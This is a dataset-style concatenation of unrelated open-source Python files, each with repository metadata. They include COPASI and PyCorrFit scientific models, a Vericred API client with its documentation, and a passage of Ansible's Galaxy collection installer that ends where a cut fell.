return gConfig.getValue( '/Resources/FileCatalogs/ThirdPartyProtocols', ['srm', 'dips'] )
| vmendez/DIRAC | ConfigurationSystem/Client/Helpers/Resources.py | Python | gpl-3.0 | 9,897 | [
"DIRAC"
] | 8304e756594115091ccc4b532f66887b8179509128a161a831283eed1ef4327d |
#!/bin/env python3
import COPASI
dm = COPASI.CRootContainer.addDatamodel()
def create_datahandler(names):
"""initialize datahandler from display names
"""
dh = COPASI.CDataHandler()
for name in names:
obj = dm.findObjectByDisplayName(name)
if not obj:
print('no object for name {0}'.format(name))
continue
if isinstance(obj, COPASI.CModel): # fix for time
obj = obj.getValueReference()
cn = obj.getCN().getString()
dh.addDuringName(COPASI.CRegisteredCommonName(cn))
print('added {0}'.format(cn))
return dh
def print_results(dh):
"""prints the data as tsv
"""
num = dh.getNumRowsDuring()
for i in range(num):
current = dh.getNthRow(i)
for j in current:
print('{0}\t'.format(j), end='')
print('\n', end='')
pass
if __name__ == "__main__":
# the brusselator example is distributed with copasi, or grab it from:
# https://github.com/copasi/COPASI/blob/develop/TestSuite/distribution/brusselator.cps
dm.loadModel('brusselator.cps')
dh = create_datahandler(['Time', '[X]', '[Y]', '(R4).Flux'])
tc = dm.getTask('Time-Course')
tc.initializeRawWithOutputHandler(COPASI.CCopasiTask.OUTPUT_DURING, dh)
tc.processRaw(True)
print_results(dh)
| copasi/COPASI | copasi/bindings/python/examples/custom_output.py | Python | artistic-2.0 | 1,243 | [
"COPASI"
] | d7712838b34adfe960de74c8817cfc1f67ee10d06c85a310bd28296fe13686e4 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This package contains standard serializers that can work generally for all
pymatgen objects.
"""
| sonium0/pymatgen | pymatgen/serializers/__init__.py | Python | mit | 211 | [
"pymatgen"
] | 63623c5dfc0698956f1b09f7cef5da1ee38414ed8d6b1d83780041ea69c3bd3f |
import numpy as np
from .control import model_setup
from .cp_confocal import twod
from .cp_triplet import trip
# 2D + TT Gauß
# Model 6003
def CF_Gxy_gauss_2DTT(parms, tau):
u""" Two-dimensional free diffusion
with a Gaussian laser profile, including two triplet components.
The triplet factor takes into account a blinking term.
Set *T* or *τ_trip* to 0, if no triplet component is wanted.
particle = 1/(1+τ/τ_diff)
triplet1 = 1 + T₁/(1-T₁)*exp(-τ/τ_trip₁)
triplet2 = 1 + T₂/(1-T₂)*exp(-τ/τ_trip₂)
G = 1/n*particle*triplet1*triplet2 + offset
*parms* - a list of parameters.
Parameters (parms[i]):
[0] n Effective number of particles in confocal volume
[1] τ_diff Diffusion time of particle
[2] τ_trip₁ Characteristic residence time in triplet state
[3] T₁ Fraction of particles in triplet (non-fluorescent) state
0 <= T < 1
[4] τ_trip₂ Characteristic residence time in triplet state
[5] T₂ Fraction of particles in triplet (non-fluorescent) state
0 <= T < 1
[6] offset
*tau* - lag time
"""
n = parms[0]
taud = parms[1]
tautrip1 = parms[2]
T1 = parms[3]
tautrip2 = parms[4]
T2 = parms[5]
off = parms[6]
g = twod(tau=tau, taudiff=taud)
tr1 = trip(tau=tau, T=T1, tautrip=tautrip1)
tr2 = trip(tau=tau, T=T2, tautrip=tautrip2)
G = off + 1/n * g * tr1 * tr2
return G
def supplements(parms, countrate=None):
# We can only give you the effective particle number
n = parms[0]
Info = list()
if countrate is not None:
# CPP
cpp = countrate/n
Info.append(["cpp [kHz]", cpp])
return Info
parms = [
4, # n
.4, # taud
0.001, # tautrip1
0.01, # T1
0.002, # tautrip2
0.01, # T2
0.0 # offset
]
# Boundaries
# strictly positive
boundaries = [[0, np.inf]]*len(parms)
# T
boundaries[3] = [0, .9999999999999]
boundaries[5] = [0, .9999999999999]
# offset
boundaries[-1] = [-np.inf, np.inf]
model_setup(
modelid=6003,
name="2D diffusion with double triplet (confocal)",
comp="T+T+2D",
mtype="Confocal (Gaussian) with double triplet",
fctn=CF_Gxy_gauss_2DTT,
par_labels=[
u"n",
u"τ_diff [ms]",
u"τ_trip₁ [ms]",
u"T₁",
u"τ_trip₂ [ms]",
u"T₂",
u"offset"
],
par_values=parms,
par_vary=[True, True, False, False, False, False, False],
par_boundaries=boundaries,
par_constraints=[[2, "<", 1], [4, ">", 2]],
par_hr_labels=[
u"n",
u"τ_diff [ms]",
u"τ_trip₁ [µs]",
u"T₁",
u"τ_trip₂ [µs]",
u"T₂",
u"offset"
],
par_hr_factors=[
1., # n
1., # taudiff
1000., # tautrip1 [µs]
1., # T1
1000., # tautrip2 [µs]
1., # T2
1. # offset
],
supplementary_method=supplements
)
| paulmueller/PyCorrFit | pycorrfit/models/model_confocal_tt_2d.py | Python | gpl-2.0 | 3,122 | [
"Gaussian"
] | dc53dd30b4337047143117e371c7e64fd128cd225dd6a38b9280c0076a1e1c99 |
# coding: utf-8
"""
Vericred API
Vericred's API allows you to search for Health Plans that a specific doctor
accepts.
## Getting Started
Visit our [Developer Portal](https://developers.vericred.com) to
create an account.
Once you have created an account, you can create one Application for
Production and another for our Sandbox (select the appropriate Plan when
you create the Application).
## SDKs
Our API follows standard REST conventions, so you can use any HTTP client
to integrate with us. You will likely find it easier to use one of our
[autogenerated SDKs](https://github.com/vericred/?query=vericred-),
which we make available for several common programming languages.
## Authentication
To authenticate, pass the API Key you created in the Developer Portal as
a `Vericred-Api-Key` header.
`curl -H 'Vericred-Api-Key: YOUR_KEY' "https://api.vericred.com/providers?search_term=Foo&zip_code=11215"`
## Versioning
Vericred's API default to the latest version. However, if you need a specific
version, you can request it with an `Accept-Version` header.
The current version is `v3`. Previous versions are `v1` and `v2`.
`curl -H 'Vericred-Api-Key: YOUR_KEY' -H 'Accept-Version: v2' "https://api.vericred.com/providers?search_term=Foo&zip_code=11215"`
## Pagination
Endpoints that accept `page` and `per_page` parameters are paginated. They expose
four additional fields that contain data about your position in the response,
namely `Total`, `Per-Page`, `Link`, and `Page` as described in [RFC-5988](https://tools.ietf.org/html/rfc5988).
For example, to display 5 results per page and view the second page of a
`GET` to `/networks`, your final request would be `GET /networks?....page=2&per_page=5`.
## Sideloading
When we return multiple levels of an object graph (e.g. `Provider`s and their `State`s
we sideload the associated data. In this example, we would provide an Array of
`State`s and a `state_id` for each provider. This is done primarily to reduce the
payload size since many of the `Provider`s will share a `State`
```
{
providers: [{ id: 1, state_id: 1}, { id: 2, state_id: 1 }],
states: [{ id: 1, code: 'NY' }]
}
```
If you need the second level of the object graph, you can just match the
corresponding id.
## Selecting specific data
All endpoints allow you to specify which fields you would like to return.
This allows you to limit the response to contain only the data you need.
For example, let's take a request that returns the following JSON by default
```
{
provider: {
id: 1,
name: 'John',
phone: '1234567890',
field_we_dont_care_about: 'value_we_dont_care_about'
},
states: [{
id: 1,
name: 'New York',
code: 'NY',
field_we_dont_care_about: 'value_we_dont_care_about'
}]
}
```
To limit our results to only return the fields we care about, we specify the
`select` query string parameter for the corresponding fields in the JSON
document.
In this case, we want to select `name` and `phone` from the `provider` key,
so we would add the parameters `select=provider.name,provider.phone`.
We also want the `name` and `code` from the `states` key, so we would
add the parameters `select=states.name,states.code`. The id field of
each document is always returned whether or not it is requested.
Our final request would be `GET /providers/12345?select=provider.name,provider.phone,states.name,states.code`
The response would be
```
{
provider: {
id: 1,
name: 'John',
phone: '1234567890'
},
states: [{
id: 1,
name: 'New York',
code: 'NY'
}]
}
```
## Benefits summary format
Benefit cost-share strings are formatted to capture:
* Network tiers
* Compound or conditional cost-share
* Limits on the cost-share
* Benefit-specific maximum out-of-pocket costs
**Example #1**
As an example, we would represent [this Summary of Benefits & Coverage](https://s3.amazonaws.com/vericred-data/SBC/2017/33602TX0780032.pdf) as:
* **Hospital stay facility fees**:
- Network Provider: `$400 copay/admit plus 20% coinsurance`
- Out-of-Network Provider: `$1,500 copay/admit plus 50% coinsurance`
- Vericred's format for this benefit: `In-Network: $400 before deductible then 20% after deductible / Out-of-Network: $1,500 before deductible then 50% after deductible`
* **Rehabilitation services:**
- Network Provider: `20% coinsurance`
- Out-of-Network Provider: `50% coinsurance`
- Limitations & Exceptions: `35 visit maximum per benefit period combined with Chiropractic care.`
- Vericred's format for this benefit: `In-Network: 20% after deductible / Out-of-Network: 50% after deductible | limit: 35 visit(s) per Benefit Period`
**Example #2**
In [this other Summary of Benefits & Coverage](https://s3.amazonaws.com/vericred-data/SBC/2017/40733CA0110568.pdf), the **specialty_drugs** cost-share has a maximum out-of-pocket for in-network pharmacies.
* **Specialty drugs:**
- Network Provider: `40% coinsurance up to a $500 maximum for up to a 30 day supply`
- Out-of-Network Provider `Not covered`
- Vericred's format for this benefit: `In-Network: 40% after deductible, up to $500 per script / Out-of-Network: 100%`
**BNF**
Here's a description of the benefits summary string, represented as a context-free grammar:
```
root ::= coverage
coverage ::= (simple_coverage | tiered_coverage) (space pipe space coverage_modifier)?
tiered_coverage ::= tier (space slash space tier)*
tier ::= tier_name colon space (tier_coverage | not_applicable)
tier_coverage ::= simple_coverage (space (then | or | and) space simple_coverage)* tier_limitation?
simple_coverage ::= (pre_coverage_limitation space)? coverage_amount (space post_coverage_limitation)? (comma? space coverage_condition)?
coverage_modifier ::= limit_condition colon space (((simple_coverage | simple_limitation) (semicolon space see_carrier_documentation)?) | see_carrier_documentation | waived_if_admitted | shared_across_tiers)
waived_if_admitted ::= ("copay" space)? "waived if admitted"
simple_limitation ::= pre_coverage_limitation space "copay applies"
tier_name ::= "In-Network-Tier-2" | "Out-of-Network" | "In-Network"
limit_condition ::= "limit" | "condition"
tier_limitation ::= comma space "up to" space (currency | (integer space time_unit plural?)) (space post_coverage_limitation)?
coverage_amount ::= currency | unlimited | included | unknown | percentage | (digits space (treatment_unit | time_unit) plural?)
pre_coverage_limitation ::= first space digits space time_unit plural?
post_coverage_limitation ::= (((then space currency) | "per condition") space)? "per" space (treatment_unit | (integer space time_unit) | time_unit) plural?
coverage_condition ::= ("before deductible" | "after deductible" | "penalty" | allowance | "in-state" | "out-of-state") (space allowance)?
allowance ::= upto_allowance | after_allowance
upto_allowance ::= "up to" space (currency space)? "allowance"
after_allowance ::= "after" space (currency space)? "allowance"
see_carrier_documentation ::= "see carrier documentation for more information"
shared_across_tiers ::= "shared across all tiers"
unknown ::= "unknown"
unlimited ::= /[uU]nlimited/
included ::= /[iI]ncluded in [mM]edical/
time_unit ::= /[hH]our/ | (((/[cC]alendar/ | /[cC]ontract/) space)? /[yY]ear/) | /[mM]onth/ | /[dD]ay/ | /[wW]eek/ | /[vV]isit/ | /[lL]ifetime/ | ((((/[bB]enefit/ plural?) | /[eE]ligibility/) space)? /[pP]eriod/)
treatment_unit ::= /[pP]erson/ | /[gG]roup/ | /[cC]ondition/ | /[sS]cript/ | /[vV]isit/ | /[eE]xam/ | /[iI]tem/ | /[sS]tay/ | /[tT]reatment/ | /[aA]dmission/ | /[eE]pisode/
comma ::= ","
colon ::= ":"
semicolon ::= ";"
pipe ::= "|"
slash ::= "/"
plural ::= "(s)" | "s"
then ::= "then" | ("," space) | space
or ::= "or"
and ::= "and"
not_applicable ::= "Not Applicable" | "N/A" | "NA"
first ::= "first"
currency ::= "$" number
percentage ::= number "%"
number ::= float | integer
float ::= digits "." digits
integer ::= /[0-9]/+ (comma_int | under_int)*
comma_int ::= ("," /[0-9]/*3) !"_"
under_int ::= ("_" /[0-9]/*3) !","
digits ::= /[0-9]/+ ("_" /[0-9]/+)*
space ::= /[ \t]/+
```
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class BasePlanSearchResponse(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, meta=None, coverages=None):
"""
BasePlanSearchResponse - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'meta': 'Meta',
'coverages': 'list[DrugCoverage]'
}
self.attribute_map = {
'meta': 'meta',
'coverages': 'coverages'
}
self._meta = meta
self._coverages = coverages
@property
def meta(self):
"""
Gets the meta of this BasePlanSearchResponse.
Meta-data
:return: The meta of this BasePlanSearchResponse.
:rtype: Meta
"""
return self._meta
@meta.setter
def meta(self, meta):
"""
Sets the meta of this BasePlanSearchResponse.
Meta-data
:param meta: The meta of this BasePlanSearchResponse.
:type: Meta
"""
self._meta = meta
@property
def coverages(self):
"""
Gets the coverages of this BasePlanSearchResponse.
Coverages associated with the plan.
:return: The coverages of this BasePlanSearchResponse.
:rtype: list[DrugCoverage]
"""
return self._coverages
@coverages.setter
def coverages(self, coverages):
"""
Sets the coverages of this BasePlanSearchResponse.
Coverages associated with the plan.
:param coverages: The coverages of this BasePlanSearchResponse.
:type: list[DrugCoverage]
"""
self._coverages = coverages
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| vericred/vericred-python | vericred_client/models/base_plan_search_response.py | Python | apache-2.0 | 12,846 | [
"VisIt"
] | 7904bc86b07e3f8cc1b8028c198fbedbff190534c47e639ae83033f03b4c2e0c |
import os
import cPickle
from IPython.parallel import Client
from pyglm.utils.parallel_util import initialize_imports, create_population_on_engines
from pyglm.utils.io import parse_cmd_line_args, load_data
from population import Population
from pyglm.models.model_factory import *
def initialize_parallel_test_harness():
# Parse command line args
(options, args) = parse_cmd_line_args()
# Load data from file or create synthetic test dataset
data = load_data(options)
print "Creating master population object"
model = make_model(options.model, N=data['N'])
stabilize_sparsity(model)
popn = Population(model)
popn.set_data(data)
# Initialize the GLM with the data
popn_true = None
x_true = None
if 'vars' in data:
x_true = data['vars']
# Load the true model
data_dir = os.path.dirname(options.dataFile)
model_file = os.path.join(data_dir, 'model.pkl')
print "Loading true model from %s" % model_file
with open(model_file) as f:
model_true = cPickle.load(f)
# HACK FOR EXISTING DATA!
if 'N_dims' not in model_true['network']['graph']:
model_true['network']['graph']['N_dims'] = 1
if 'location_prior' not in model_true['network']['graph']:
model_true['network']['graph']['location_prior'] = \
{
'type' : 'gaussian',
'mu' : 0.0,
'sigma' : 1.0
}
if 'L' in x_true['net']['graph']:
x_true['net']['graph']['L'] = x_true['net']['graph']['L'].ravel()
# END HACK
popn_true = Population(model_true)
popn_true.set_data(data)
# Create a client with direct view to all engines
if options.json is not None:
client = Client(options.json)
else:
client = Client(profile=options.profile)
dview = client[:]
print "Found %d engines." % len(dview)
print "Initializing imports on each engine"
initialize_imports(dview)
print "Creating population objects on each engine"
create_population_on_engines(dview, data, options.model)
return options, popn, data, client, popn_true, x_true
| slinderman/theano_pyglm | test/parallel_harness.py | Python | mit | 2,396 | [
"Gaussian"
] | 3d51c7427d02eb2b693e197adcdbb6e95dc1b61c1f5a7a1111b9705067da6161 |
# Copyright (C) 2016 Zhixian MA <zxma_sjtu@qq.com>
"""
Transform cavities regions of samples selected from paper
arXiv-1610.03487.
Reference
---------
[1] J. Shin, J. Woo, and, J. Mulchaey
"A systematic search for X-ray cavities in galaxy clusters,
groups, and elliptical galaxies"
arXiv-1610.03487
"""
import os
import argparse
import cnn_utils as utils
def main():
"""The main function"""
# Init
parser = argparse.ArgumentParser(description="Region transform")
# parameters
parser.add_argument("inpath", help="path holding the samples.")
args = parser.parse_args()
# Judge existance of the paths
try:
samples = os.listdir(args.inpath)
except IOError:
print("Inpath does not exist.")
return
# Transform region
fp = open("sample_z.log",'a')
for s in samples:
print("Processing on %s..." % s)
# get redshift
z = utils.get_redshift(s)
if z != -1:
# calc rate
rate = utils.calc_rate(z)
fp.write("%s\t%f\t%f\n" % (s, z, rate))
# region exchange
sample_path = args.inpath + '/' + s + '/'
regpath = os.path.join(sample_path, 'cavities.reg')
print(regpath)
utils.reg_exchange(regpath, rate, unit='kpc')
else:
pass
if __name__ == "__main__":
main()
| myinxd/cavdet | cnn/getReg.py | Python | mit | 1,385 | [
"Galaxy"
] | e1a763f962ee01f5918047d445cfc3385e8e0725654afcd06accf11af49a0b9d |
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkImageDifference(SimpleVTKClassModuleBase):
def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkImageDifference(), 'Processing.',
('vtkImageData', 'vtkImageData'), ('vtkImageData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
| chrisidefix/devide | modules/vtk_basic/vtkImageDifference.py | Python | bsd-3-clause | 508 | [
"VTK"
] | 53a46d260875d64e90b09d668288ba021d49cb92471a0f004be068fed8fcdfe5 |
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import fnmatch
import json
import operator
import os
import shutil
import stat
import sys
import tarfile
import tempfile
import threading
import time
import yaml
from collections import namedtuple
from contextlib import contextmanager
from distutils.version import LooseVersion
from hashlib import sha256
from io import BytesIO
from yaml.error import YAMLError
try:
import queue
except ImportError:
import Queue as queue # Python 2
import ansible.constants as C
from ansible.errors import AnsibleError
from ansible.galaxy import get_collections_galaxy_meta_info
from ansible.galaxy.api import CollectionVersionMetadata, GalaxyError
from ansible.galaxy.user_agent import user_agent
from ansible.module_utils import six
from ansible.module_utils._text import to_bytes, to_native, to_text
from ansible.utils.collection_loader import AnsibleCollectionRef
from ansible.utils.display import Display
from ansible.utils.hashing import secure_hash, secure_hash_s
from ansible.utils.version import SemanticVersion
from ansible.module_utils.urls import open_url
urlparse = six.moves.urllib.parse.urlparse
urllib_error = six.moves.urllib.error
display = Display()
MANIFEST_FORMAT = 1
ModifiedContent = namedtuple('ModifiedContent', ['filename', 'expected', 'installed'])
class CollectionRequirement:
_FILE_MAPPING = [(b'MANIFEST.json', 'manifest_file'), (b'FILES.json', 'files_file')]
def __init__(self, namespace, name, b_path, api, versions, requirement, force, parent=None, metadata=None,
files=None, skip=False, allow_pre_releases=False):
"""
Represents a collection requirement, the versions that are available to be installed as well as any
dependencies the collection has.
:param namespace: The collection namespace.
:param name: The collection name.
:param b_path: Byte str of the path to the collection tarball if it has already been downloaded.
:param api: The GalaxyAPI to use if the collection is from Galaxy.
:param versions: A list of versions of the collection that are available.
:param requirement: The version requirement string used to verify the list of versions fit the requirements.
:param force: Whether the force flag applied to the collection.
:param parent: The name of the parent the collection is a dependency of.
:param metadata: The galaxy.api.CollectionVersionMetadata that has already been retrieved from the Galaxy
server.
:param files: The files that exist inside the collection. This is based on the FILES.json file inside the
collection artifact.
:param skip: Whether to skip installing the collection. Should be set if the collection is already installed
and force is not set.
:param allow_pre_releases: Whether to skip pre-release versions of collections.
"""
self.namespace = namespace
self.name = name
self.b_path = b_path
self.api = api
self._versions = set(versions)
self.force = force
self.skip = skip
self.required_by = []
self.allow_pre_releases = allow_pre_releases
self._metadata = metadata
self._files = files
self.add_requirement(parent, requirement)
def __str__(self):
return to_native("%s.%s" % (self.namespace, self.name))
def __unicode__(self):
return u"%s.%s" % (self.namespace, self.name)
@property
def metadata(self):
self._get_metadata()
return self._metadata
@property
def versions(self):
if self.allow_pre_releases:
return self._versions
return set(v for v in self._versions if v == '*' or not SemanticVersion(v).is_prerelease)
@versions.setter
def versions(self, value):
self._versions = set(value)
@property
def pre_releases(self):
return set(v for v in self._versions if SemanticVersion(v).is_prerelease)
@property
def latest_version(self):
try:
return max([v for v in self.versions if v != '*'], key=SemanticVersion)
except ValueError: # ValueError: max() arg is an empty sequence
return '*'
@property
def dependencies(self):
if not self._metadata:
if len(self.versions) > 1:
return {}
self._get_metadata()
dependencies = self._metadata.dependencies
if dependencies is None:
return {}
return dependencies
def add_requirement(self, parent, requirement):
self.required_by.append((parent, requirement))
new_versions = set(v for v in self.versions if self._meets_requirements(v, requirement, parent))
if len(new_versions) == 0:
if self.skip:
force_flag = '--force-with-deps' if parent else '--force'
version = self.latest_version if self.latest_version != '*' else 'unknown'
msg = "Cannot meet requirement %s:%s as it is already installed at version '%s'. Use %s to overwrite" \
% (to_text(self), requirement, version, force_flag)
raise AnsibleError(msg)
elif parent is None:
msg = "Cannot meet requirement %s for dependency %s" % (requirement, to_text(self))
else:
msg = "Cannot meet dependency requirement '%s:%s' for collection %s" \
% (to_text(self), requirement, parent)
collection_source = to_text(self.b_path, nonstring='passthru') or self.api.api_server
req_by = "\n".join(
"\t%s - '%s:%s'" % (to_text(p) if p else 'base', to_text(self), r)
for p, r in self.required_by
)
versions = ", ".join(sorted(self.versions, key=SemanticVersion))
if not self.versions and self.pre_releases:
pre_release_msg = (
'\nThis collection only contains pre-releases. Utilize `--pre` to install pre-releases, or '
'explicitly provide the pre-release version.'
)
else:
pre_release_msg = ''
raise AnsibleError(
"%s from source '%s'. Available versions before last requirement added: %s\nRequirements from:\n%s%s"
% (msg, collection_source, versions, req_by, pre_release_msg)
)
self.versions = new_versions
def download(self, b_path):
download_url = self._metadata.download_url
artifact_hash = self._metadata.artifact_sha256
headers = {}
self.api._add_auth_token(headers, download_url, required=False)
b_collection_path = _download_file(download_url, b_path, artifact_hash, self.api.validate_certs,
headers=headers)
return to_text(b_collection_path, errors='surrogate_or_strict')
def install(self, path, b_temp_path):
if self.skip:
display.display("Skipping '%s' as it is already installed" % to_text(self))
return
# Install if it is not
collection_path = os.path.join(path, self.namespace, self.name)
b_collection_path = to_bytes(collection_path, errors='surrogate_or_strict')
display.display("Installing '%s:%s' to '%s'" % (to_text(self), self.latest_version, collection_path))
if self.b_path is None:
self.b_path = self.download(b_temp_path)
if os.path.exists(b_collection_path):
shutil.rmtree(b_collection_path)
os.makedirs(b_collection_path)
try:
with tarfile.open(self.b_path, mode='r') as collection_tar:
files_member_obj = collection_tar.getmember('FILES.json')
with _tarfile_extract(collection_tar, files_member_obj) as files_obj:
files = json.loads(to_text(files_obj.read(), errors='surrogate_or_strict'))
_extract_tar_file(collection_tar, 'MANIFEST.json', b_collection_path, b_temp_path)
_extract_tar_file(collection_tar, 'FILES.json', b_collection_path, b_temp_path)
for file_info in files['files']:
file_name = file_info['name']
if file_name == '.':
continue
if file_info['ftype'] == 'file':
_extract_tar_file(collection_tar, file_name, b_collection_path, b_temp_path,
expected_hash=file_info['chksum_sha256'])
else:
os.makedirs(os.path.join(b_collection_path, to_bytes(file_name, errors='surrogate_or_strict')), mode=0o0755)
except Exception:
# Ensure we don't leave the dir behind in case of a failure.
shutil.rmtree(b_collection_path)
b_namespace_path = os.path.dirname(b_collection_path)
if not os.listdir(b_namespace_path):
os.rmdir(b_namespace_path)
raise
def set_latest_version(self):
self.versions = set([self.latest_version])
self._get_metadata()
def verify(self, remote_collection, path, b_temp_tar_path):
if not self.skip:
display.display("'%s' has not been installed, nothing to verify" % (to_text(self)))
return
collection_path = os.path.join(path, self.namespace, self.name)
b_collection_path = to_bytes(collection_path, errors='surrogate_or_strict')
display.vvv("Verifying '%s:%s'." % (to_text(self), self.latest_version))
display.vvv("Installed collection found at '%s'" % collection_path)
display.vvv("Remote collection found at '%s'" % remote_collection.metadata.download_url)
# Compare installed version versus requirement version
if self.latest_version != remote_collection.latest_version:
err = "%s has the version '%s' but is being compared to '%s'" % (to_text(self), self.latest_version, remote_collection.latest_version)
display.display(err)
return
modified_content = []
# Verify the manifest hash matches before verifying the file manifest
expected_hash = _get_tar_file_hash(b_temp_tar_path, 'MANIFEST.json')
self._verify_file_hash(b_collection_path, 'MANIFEST.json', expected_hash, modified_content)
manifest = _get_json_from_tar_file(b_temp_tar_path, 'MANIFEST.json')
# Use the manifest to verify the file manifest checksum
file_manifest_data = manifest['file_manifest_file']
file_manifest_filename = file_manifest_data['name']
expected_hash = file_manifest_data['chksum_%s' % file_manifest_data['chksum_type']]
# Verify the file manifest before using it to verify individual files
self._verify_file_hash(b_collection_path, file_manifest_filename, expected_hash, modified_content)
file_manifest = _get_json_from_tar_file(b_temp_tar_path, file_manifest_filename)
# Use the file manifest to verify individual file checksums
for manifest_data in file_manifest['files']:
if manifest_data['ftype'] == 'file':
expected_hash = manifest_data['chksum_%s' % manifest_data['chksum_type']]
self._verify_file_hash(b_collection_path, manifest_data['name'], expected_hash, modified_content)
if modified_content:
display.display("Collection %s contains modified content in the following files:" % to_text(self))
display.display(to_text(self))
display.vvv(to_text(self.b_path))
for content_change in modified_content:
display.display(' %s' % content_change.filename)
display.vvv(" Expected: %s\n Found: %s" % (content_change.expected, content_change.installed))
else:
display.vvv("Successfully verified that checksums for '%s:%s' match the remote collection" % (to_text(self), self.latest_version))
def _verify_file_hash(self, b_path, filename, expected_hash, error_queue):
b_file_path = to_bytes(os.path.join(to_text(b_path), filename), errors='surrogate_or_strict')
if not os.path.isfile(b_file_path):
actual_hash = None
else:
with open(b_file_path, mode='rb') as file_object:
actual_hash = _consume_file(file_object)
if expected_hash != actual_hash:
error_queue.append(ModifiedContent(filename=filename, expected=expected_hash, installed=actual_hash))
def _get_metadata(self):
if self._metadata:
return
self._metadata = self.api.get_collection_version_metadata(self.namespace, self.name, self.latest_version)
def _meets_requirements(self, version, requirements, parent):
"""
Supports version identifiers can be '==', '!=', '>', '>=', '<', '<=', '*'. Each requirement is delimited by ','
"""
op_map = {
'!=': operator.ne,
'==': operator.eq,
'=': operator.eq,
'>=': operator.ge,
'>': operator.gt,
'<=': operator.le,
'<': operator.lt,
}
for req in list(requirements.split(',')):
op_pos = 2 if len(req) > 1 and req[1] == '=' else 1
op = op_map.get(req[:op_pos])
requirement = req[op_pos:]
if not op:
requirement = req
op = operator.eq
# In the case we are checking a new requirement on a base requirement (parent != None) we can't accept
# version as '*' (unknown version) unless the requirement is also '*'.
if parent and version == '*' and requirement != '*':
display.warning("Failed to validate the collection requirement '%s:%s' for %s when the existing "
"install does not have a version set, the collection may not work."
% (to_text(self), req, parent))
continue
elif requirement == '*' or version == '*':
continue
if not op(SemanticVersion(version), SemanticVersion.from_loose_version(LooseVersion(requirement))):
break
else:
return True
# The loop was broken early, it does not meet all the requirements
return False
@staticmethod
def from_tar(b_path, force, parent=None):
if not tarfile.is_tarfile(b_path):
raise AnsibleError("Collection artifact at '%s' is not a valid tar file." % to_native(b_path))
info = {}
with tarfile.open(b_path, mode='r') as collection_tar:
for b_member_name, property_name in CollectionRequirement._FILE_MAPPING:
n_member_name = to_native(b_member_name)
try:
member = collection_tar.getmember(n_member_name)
except KeyError:
raise AnsibleError("Collection at '%s' does not contain the required file %s."
% (to_native(b_path), n_member_name))
with _tarfile_extract(collection_tar, member) as member_obj:
try:
info[property_name] = json.loads(to_text(member_obj.read(), errors='surrogate_or_strict'))
except ValueError:
raise AnsibleError("Collection tar file member %s does not contain a valid json string."
% n_member_name)
meta = info['manifest_file']['collection_info']
files = info['files_file']['files']
namespace = meta['namespace']
name = meta['name']
version = meta['version']
meta = CollectionVersionMetadata(namespace, name, version, None, None, meta['dependencies'])
if SemanticVersion(version).is_prerelease:
allow_pre_release = True
else:
allow_pre_release = False
return CollectionRequirement(namespace, name, b_path, None, [version], version, force, parent=parent,
metadata=meta, files=files, allow_pre_releases=allow_pre_release)
@staticmethod
def from_path(b_path, force, parent=None, fallback_metadata=False):
info = {}
for b_file_name, property_name in CollectionRequirement._FILE_MAPPING:
b_file_path = os.path.join(b_path, b_file_name)
if not os.path.exists(b_file_path):
continue
with open(b_file_path, 'rb') as file_obj:
try:
info[property_name] = json.loads(to_text(file_obj.read(), errors='surrogate_or_strict'))
except ValueError:
raise AnsibleError("Collection file at '%s' does not contain a valid json string."
% to_native(b_file_path))
if not info and fallback_metadata:
b_galaxy_path = os.path.join(b_path, b'galaxy.yml')
if os.path.exists(b_galaxy_path):
collection_meta = _get_galaxy_yml(b_galaxy_path)
info['files_file'] = _build_files_manifest(b_path, collection_meta['namespace'], collection_meta['name'],
collection_meta['build_ignore'])
info['manifest_file'] = _build_manifest(**collection_meta)
allow_pre_release = False
if 'manifest_file' in info:
manifest = info['manifest_file']['collection_info']
namespace = manifest['namespace']
name = manifest['name']
version = to_text(manifest['version'], errors='surrogate_or_strict')
try:
_v = SemanticVersion()
_v.parse(version)
if _v.is_prerelease:
allow_pre_release = True
except ValueError:
display.warning("Collection at '%s' does not have a valid version set, falling back to '*'. Found "
"version: '%s'" % (to_text(b_path), version))
version = '*'
dependencies = manifest['dependencies']
else:
if fallback_metadata:
warning = "Collection at '%s' does not have a galaxy.yml or a MANIFEST.json file, cannot detect version."
else:
warning = "Collection at '%s' does not have a MANIFEST.json file, cannot detect version."
display.warning(warning % to_text(b_path))
parent_dir, name = os.path.split(to_text(b_path, errors='surrogate_or_strict'))
namespace = os.path.split(parent_dir)[1]
version = '*'
dependencies = {}
meta = CollectionVersionMetadata(namespace, name, version, None, None, dependencies)
files = info.get('files_file', {}).get('files', {})
